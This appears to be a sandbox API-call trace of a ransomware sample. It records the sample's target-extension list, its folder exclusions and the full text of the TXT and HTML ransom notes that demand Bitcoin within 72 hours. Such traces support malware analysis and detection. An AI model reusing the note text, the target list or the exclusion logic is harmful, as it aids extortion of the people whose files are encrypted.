	[0175.455] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0175.456] FindNextFileW (in: hFindFile=0xfb9230, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1882aa2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1882aa2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0175.456] FindClose (in: hFindFile=0xfb9230 | out: hFindFile=0xfb9230) returned 1
	[0175.456] FindClose (in: hFindFile=0xfb9230 | out: hFindFile=0xfb9230) returned 0
	[0175.456] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime"
	[0175.457] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*"
	[0175.457] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.457] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.457] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0175.457] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.458] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.458] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.461] CloseHandle (hObject=0x39c) returned 1
	[0175.461] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.462] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0175.464] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.464] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.465] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.465] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.465] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0175.465] CloseHandle (hObject=0x39c) returned 1
	[0175.465] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.466] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.466] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.466] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0175.466] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.471] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.471] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0175.474] CloseHandle (hObject=0x39c) returned 1
	[0175.474] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.475] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.475] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0175.477] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.477] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.477] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.477] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.477] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0175.478] CloseHandle (hObject=0x39c) returned 1
	[0175.478] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x821e6748, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName=".", cAlternateFileName="")) returned 0xfb9570
	[0175.478] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*") returned 97
	[0175.478] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.479] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*") returned 0x61
	[0175.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.480] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0175.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.480] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0175.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0175.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0175.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0175.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0175.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0175.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0175.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0175.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0175.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0175.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0175.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.485] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0175.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.485] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0175.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.485] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0175.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.486] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0175.486] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.486] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.486] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x821e6748, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="..", cAlternateFileName="")) returned 1
	[0175.486] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.486] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821e6748, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x821e6748, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x821e6748, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
